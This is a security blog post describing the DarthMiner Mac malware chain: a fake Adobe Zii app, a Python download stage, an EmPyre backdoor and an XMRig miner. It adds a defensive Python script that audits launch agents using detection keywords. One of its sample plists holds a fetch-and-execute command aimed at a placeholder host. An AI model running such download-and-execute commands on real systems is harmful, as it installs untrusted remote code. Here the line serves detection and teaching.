
DarthMiner Malware Targets Mac Users via Adobe

Posted: December 11, 2018 to Technology.

Tags: Malware, Data Breach, Cloud Security

DarthMiner is a recently discovered threat that targets Mac systems via Adobe. Malwarebytes security researchers warn that the threat is actually a combination of two open-source programs. The threat is distributed through an application called Adobe Zii. It uses a generic Automator applet icon instead of a stolen Adobe Creative Cloud logo. The fake application runs a shell script that downloads and executes a Python script. That script then downloads and runs an app named sample.app, which appears to be a version of Adobe Zii, in an effort to conceal the malicious activity. Malwarebytes states that “the obfuscated Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and stops the infection process if the tool is found.” They also note that the firewall should have already blocked the script’s download attempts.

Next, the script opens an EmPyre backdoor that can execute arbitrary commands on the infected Mac. Scripts are fetched via that backdoor, and other malicious components are installed. It is this backdoor that is the true concern. A launch agent ensures persistence. As if that weren’t enough, the attack also installs the XMRig cryptominer on the compromised Mac, with its own launch agent to keep the process running. “It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things,” Malwarebytes notes. Further analysis of the script also revealed code to download and install a root certificate for the mitmproxy tool. That tool can intercept web traffic, including encrypted traffic, though it isn’t active in the observed malware.

A key issue surrounding this threat is software piracy, which will compound Mac infections if the threat is copied and distributed along with pirated software.
Malwarebytes implored people to forgo downloading and using pirated software, pointing out that it could cost users more than buying legitimate software. Security awareness training can also prevent many computer and system infections. Learn more about it here.
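The persistence described above (a launch agent that re-runs a shell or Python download stage at login) can be triaged by auditing launchd plists for interpreter-driven "fetch and execute" command lines. The Python below is an added example, not code from Malwarebytes or from the original post; the heuristic tokens, the flagged temporary-directory paths and both sample plists are constructed assumptions, not indicators from the DarthMiner analysis.

```python
import plistlib
from pathlib import Path
from typing import List

# Interpreters a dropper typically wraps in a launch agent (assumed heuristic).
INTERPRETERS = {"sh", "bash", "zsh", "python", "python2", "python3", "osascript"}
# Substrings that suggest the agent fetches or decodes code at load time (assumed heuristic).
SUSPICIOUS_TOKENS = ("curl ", "wget ", "http://", "https://", "base64", "urlopen", "exec(")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/private/tmp/")


def audit_launch_agent(plist_bytes: bytes) -> List[str]:
    """Return the reasons a launchd plist looks like malware persistence (empty if none)."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:  # malformed XML or binary plist: expat and plistlib errors differ
        return ["unparseable plist"]
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    if not args:
        return ["no program defined"]
    reasons = []
    exe = Path(str(args[0])).name           # e.g. "/bin/sh" -> "sh"
    cmdline = " ".join(str(a) for a in args)
    if exe in INTERPRETERS and any(tok in cmdline for tok in SUSPICIOUS_TOKENS):
        reasons.append(f"{exe} runs a download/decode command line")
    if any(str(a).startswith(TEMP_DIRS) for a in args):
        reasons.append("program lives in a temporary directory")
    # RunAtLoad + KeepAlive on an already-suspicious agent means it is kept resident.
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive keeps it resident")
    return reasons


# Constructed sample: a benign agent that starts a signed app bundle.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array>
<string>/Applications/Backup.app/Contents/MacOS/backup</string><string>--daemon</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample mirroring the chain in the article: sh pulls a Python stage and runs it.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>curl -s http://stage.example.invalid/s2.py | python</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""
```

Run it over every file in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; anything flagged deserves a look at the fetched payload, not an automatic deletion.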


About the Author

Craig Petronella, CEO and Founder of Petronella Technology Group
CEO, Founder & AI Architect, Petronella Technology Group

Craig Petronella founded Petronella Technology Group in 2002 and has spent more than 30 years working at the intersection of cybersecurity, AI, compliance, and digital forensics. He holds the CMMC Registered Practitioner credential (RP-1372) issued by the Cyber AB, is an NC Licensed Digital Forensics Examiner (License #604180-DFE), and completed MIT Professional Education programs in AI, Blockchain, and Cybersecurity. Craig also holds CompTIA Security+, CCNA, and Hyperledger certifications.

He is an Amazon #1 Best-Selling Author of 15+ books on cybersecurity and compliance, host of the Encrypted Ambition podcast (95+ episodes on Apple Podcasts, Spotify, and Amazon), and a cybersecurity keynote speaker with 200+ engagements at conferences, law firms, and corporate boardrooms. Craig serves as Contributing Editor for Cybersecurity at NC Triangle Attorney at Law Magazine and is a guest lecturer at NCCU School of Law. He has served as a digital forensics expert witness in federal and state court cases involving cybercrime, cryptocurrency fraud, SIM-swap attacks, and data breaches.

Under his leadership, Petronella Technology Group has served 2,500+ clients, maintained a zero-breach record among compliant clients, earned a BBB A+ rating every year since 2003, and been featured as a cybersecurity authority on CBS, ABC, NBC, FOX, and WRAL. The company leverages SOC 2 Type II certified platforms and specializes in AI implementation, managed cybersecurity, CMMC/HIPAA/SOC 2 compliance, and digital forensics for businesses across the United States.
